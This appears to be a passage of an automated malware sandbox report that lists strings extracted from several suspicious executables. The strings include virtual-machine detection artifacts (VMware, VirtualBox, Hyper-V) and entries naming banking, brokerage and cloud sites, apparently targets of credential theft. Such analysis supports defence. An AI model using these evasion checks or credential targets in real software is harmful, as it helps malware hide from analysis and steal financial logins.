Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.4.dr Binary or memory string: vmci.sys
Source: AKFHDBFI.0.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: AKFHDBFI.0.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: vmware
Source: AKFHDBFI.0.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.4.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: AKFHDBFI.0.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: explorti.exe, explorti.exe, 0000000D.00000002.3229087178.00000000006A4000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual USB Mouse
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: AKFHDBFI.0.dr Binary or memory string: discord.comVMware20,11696428655f
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: Amcache.hve.4.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: AKFHDBFI.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: AKFHDBFI.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: AKFHDBFI.0.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Hyper-V (guest)
Source: Amcache.hve.4.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: AKFHDBFI.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: AKFHDBFI.0.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: AKFHDBFI.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: AKFHDBFI.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Amcache.hve.4.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: Amcache.hve.4.dr Binary or memory string: vmci.syshbin`
Source: AKFHDBFI.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.4.dr Binary or memory string: \driver\vmci,\driver\pci
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000FEC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.00000000003CC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ~VirtualMachineTypes
Source: AKFHDBFI.0.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: AKFHDBFI.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000FEC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.00000000003CC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000FEC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.00000000003CC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: EHDHDHIECG.exe, 00000006.00000002.2284909895.00000000008D4000.00000040.00000001.01000000.00000009.sdmp, explorti.exe, 00000009.00000002.2316242908.00000000006A4000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000A.00000002.2326357580.00000000006A4000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000D.00000002.3229087178.00000000006A4000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: AKFHDBFI.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Hyper-V
Source: Amcache.hve.4.dr Binary or memory string: VMware
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: AKFHDBFI.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: AKFHDBFI.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: AKFHDBFI.0.dr Binary or memory string: global block list test formVMware20,11696428655
Source: Amcache.hve.4.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.000000000202C000.00000004.00000020.00020000.00000000.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2171110129.0000000002056000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000D.00000002.3230163969.000000000125C000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000D.00000002.3230163969.0000000001229000.00000004.00000020.00020000.00000000.sdmp, a3b2c9311b.exe, 0000000E.00000002.2770510086.000000000131B000.00000004.00000020.00020000.00000000.sdmp, a3b2c9311b.exe, 0000000E.00000002.2770510086.000000000134A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: AKFHDBFI.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.4.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: AKFHDBFI.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.0000000001FEE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware}r
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: AKFHDBFI.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: AKFHDBFI.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.4.dr Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: a3b2c9311b.exe, 0000000E.00000002.2770510086.00000000012DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: AKFHDBFI.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.4.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr Binary or memory string: VMware VMCI Bus Device
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
